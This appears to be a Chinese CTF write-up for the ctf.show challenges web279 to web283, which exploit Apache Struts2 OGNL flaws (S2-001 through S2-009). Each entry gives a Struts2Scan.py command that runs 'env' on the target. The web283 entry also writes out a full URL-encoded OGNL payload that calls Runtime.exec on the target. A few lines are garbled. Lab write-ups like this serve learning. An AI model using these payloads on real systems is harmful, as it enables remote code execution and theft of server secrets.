1.web279
发现是s2-001,应该是strus2框架漏洞
使用python通杀脚本struscan
可能需要安装lxml库
python -m pip install lxml -i https://pypi.tuna.tsinghua.edu.cn/simple
python Struts2Scan.py -u "http://9ace4a67-37bf-44b7-ba40-e616bdb7a562.challenge.ctf.show/S2-001/login.action" -n S2-001 -e
env
q
2.web280
漏洞为s2-005
python Struts2Scan.py -u "http://39e64f18-fbf7-440f-914a-10719379939e.challenge.ctf.show/S2-005/example/HelloWorld.action" -n S2-005 -e
env" -n S2-001 -e
env
3.web281
漏洞编号为s2-016
工具不太行,题目是s2-007,但扫出来是s2-016
python Struts2Scan.py -u "http://8fda131a-29da-4ce8-a528-2be849e1541a.challenge.ctf.show/S2-007/user.action" -n S2-016 -e
env
4.web282
漏洞编号s2-008
python Struts2Scan.py -u "http://0a82b3c6-ad15-4aab-8a4b-01f65f476294.challenge.ctf.show/S2-008/cookie.action" -n S2-008 -e
env
两种方式,改url地址即可
5.web283
漏洞编号为s2-008,但考的是s2-009
python Struts2Scan.py -u "http://f80085ec-c68d-48e3-a7a4-741df2e6bc6a.challenge.ctf.show/S2-009/showcase.action" -n s2-008 -e
env
或
http://f80085ec-c68d-48e3-a7a4-741df2e6bc6a.challenge.ctf.show/S2-009/ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27env%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]
参考文章:
web283